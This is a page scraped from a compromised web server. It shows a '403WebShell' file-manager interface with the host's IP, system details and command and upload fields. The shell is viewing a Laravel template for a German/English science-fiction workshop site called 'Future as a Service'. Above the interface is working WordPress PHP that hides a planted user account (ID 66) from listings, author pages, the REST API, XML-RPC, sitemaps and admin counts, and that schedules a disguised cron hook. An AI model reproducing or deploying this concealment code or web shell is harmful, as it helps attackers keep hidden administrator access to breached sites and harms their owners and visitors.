add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/demofutures.com/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/demofutures.com/storage/framework/views/5f456782ff569294ca8b889f81e5d909.php
<?php $__env->startSection('content'); ?>
<header class="masthead d-flex align-items-center">
    <div class="container px-4 px-lg-5 text-center">
        <h1 class="mb-1">Future as a Service</h1>
    </div>
</header>
<!-- About-->
<section class="content-section bg-light" id="about">
    <div class="container px-4 px-lg-5 text-center">
        <div class="row gx-4 gx-lg-5 justify-content-center">
            <div class="col-lg-10">
       
                <h1 class="mb-5">
                    <?php echo e(__('messages.Vorstellen')); ?>

                </h1>
                <?php if(App::getLocale()=="de"): ?>
                <p class="main_story">Seit einigen Jahren geht die technische Entwicklung so schnell, dass wir, dass unsere Gesellschaft und jeder einzelne, nur noch reagieren können. Wir können die Technik nehmen und schauen, was wir daraus machen, und mit genügend Bildung und Ressourcen-Zugang können manche von uns daran anpassen. An die Zukunft denken wir dabei schon lange nicht mehr. Wir fliegen auf Sicht. Wir reagieren auf das was kommt.</h3>
                <h3>Gestalten statt reagieren</h3>
                <p class="main_story">Wir sind der Meinung dass es unsere Verantwortung ist, die Zukunft aktiv zu gestalten. Wir glauben, dass wir eine klare Vision für eine wünschenswerte Zukunft brauchen, um Technologie effektiv zu bewerten und und für diese Vision einzusetzen. Dafür müssen wir uns alle überlegen, welche Zukunft wir eigentlich wollen, und wie uns Technologie dorthin bringen kann - oder abbringen.</h3>
               
                <h3>Jeder einzelne kann eine wünschenswerte Zukunft denken</h3>
                <p class="main_story">Wir arbeiten auf dieses Ziel hin, indem wir kreatives Science-Fiction-Writing in Workshops nutzen. Mit Science-Fiction-Writing schaffen wir es, Protagonisten in einer technisch detaillierten Zukunft natürlich in ihrer Umgebung agieren zu lassen. Durch die Workshops ermutigen, befähigen und helfen wir Menschen aller Herkunft, sich eine wünschenswerte Zukunft auszudenken und in kleinen Geschichten zu formulieren und zu diskutieren.</p>
                <p class="main_story">Wir sammeln diese Geschichten und laden alle "Profis" ein, diese Geschichten in die Welt zu tragen. Dadurch entstehen konkrete, wünschenswerte Zukunftsvisionen, an deren Verwirklichung wir sowohl individuell als auch gemeinschaftlich arbeiten können.</p>

                <h3>Aktives Handeln hin zu einer lebenswerten Zukunft</h3>
                <p class="main_story">Konkret besteht dieses "Projekt" aus vier Ebenen. Wir organisieren Workshops, die es allen ermöglichen, wünschenswerte Zukünfte mitzugestalten. Wir sammeln die Geschichten um sie allen zugänglich zu machen und zusammenzuführen. Wir laden Schriftsteller, Künstler und Medienschaffende ein, die Geschichten in positive spannende Narrative zu übersetzen, dass wir nicht nur reagieren müssen, sondern unsere Zukunft aktiv gestalten können.</p>
                <p class="main_story">Unser Ziel ist, dass daraus individuelle und kollektive Handlungsansätze entstehen, die uns motivieren, Einfluss auf diese wünschenswerte Zukunft zu nehmen, weil wir in ihr leben wollen.
                </p>

                <?php endif; ?>


                <?php if(App::getLocale()=="en"): ?>
                    
                <p class="main_story">For several years now, the pace of technological development has been so rapid that we, our society, and every individual can only react. We can take the technology and see what we can make of it, and with sufficient education and access to resources, some of us can adapt to it. However, we have long since stopped thinking about the future. We're flying by the seat of our pants, reacting to whatever comes our way.</p>
                <h3>Reclaiming our future</h3>
                <p class="main_story">It's high time we reclaime our future, molding it with intention, using technology as a tool of creation, not mere adaptation. For this, we require a tangible dream of our future, one that can serve as a rallying point for collective discourse and action.</p>
                <h3>Everyone can imagine a desirable future</h3>
                
                <p class="main_story">We're working towards this goal by using creative science fiction writing in workshops. Through science fiction writing, we're able to create protagonists who naturally act in their environment in a technically detailed future. The workshops encourage, empower, and assist people of all backgrounds in conceiving a desirable future and formulating it into short stories to discuss. We may call this &quot;Democratize Futures&quot;</p>

                <p class="main_story">We collect these stories and invite all professionals to carry these stories into the world. In this way, concrete, desirable visions of the future emerge, towards which we can work both individually and collectively.</p>
                
                <h3>A call to action</h3>
                <p class="main_story">This project specifically consists of four levels. We organise workshops that enable everyone to help shape desirable futures. We collect the stories to make them accessible to everyone and bring them together. We invite writers, artists, and media professionals to translate the stories into positive, exciting narratives, showing us that we don't just have to react, but can actively shape our future. Our hope is that this will lead to individual and collective courses of action that motivate us to influence this desirable future because we want to live in it.</p>
                <p class="main_story">Now that we have stated our intention and mission, we are asking for you to join and contribute. In whatever way you can. Thank you</p>

                <?php endif; ?>


                    
            </div>
        </div>
        <div class="row justify-content-center">
            <div class="col-5 align-self-center">
               <h3>Workshop</h3>
               <p><?php echo e(__('messages.sensibilisieren')); ?></p>
            </div>
            <div class="col-5 d-flex align-self-center">
                <a href="/workshop"><img class="img-fluid" src="/images/workshop_1.jpg" /></a>
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col">
                <img src="/images/arrow_down.svg">
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col-5 d-flex align-self-center">
                <img  class="img-fluid" src="/images/collection_2.jpg" />
            </div>
            <div class="col-5 align-self-center">
                <h3><?php echo e(__('messages.Sammeln')); ?></h3>
                <p><?php echo e(__('messages.aggregieren')); ?></p>
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col">
                <img src="/images/arrow_down.svg">
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col-5 align-self-center">
                <h3><?php echo e(__('messages.Kommunizieren')); ?></h3>
                <p><?php echo e(__('messages.kommunizieren')); ?></p>
            </div>
            <div class="col-5 d-flex align-self-center">
                <img  class="img-fluid" src="/images/communication_3.jpg" />
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col">
                <img src="/images/arrow_down.svg">
            </div>
        </div>
        <div class="row mt-2 justify-content-center">
            <div class="col-5 d-flex align-self-center">
                <img class="img-fluid" src="/images/planning_4.jpg" />
            </div>
            <div class="col-5 align-self-center">
                <h3><?php echo e(__('messages.Planen')); ?></h3>
                <p><?php echo e(__('messages.planen')); ?></p>
             </div>


        </div>

    </div>
</section>
<!-- Services-->

<!-- Footer-->

<!-- Scroll to Top Button-->
<a class="scroll-to-top rounded" href="#page-top"><i class="fas fa-angle-up"></i></a>

<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /Users/janus/code/future-as-a-service/resources/views/welcome.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit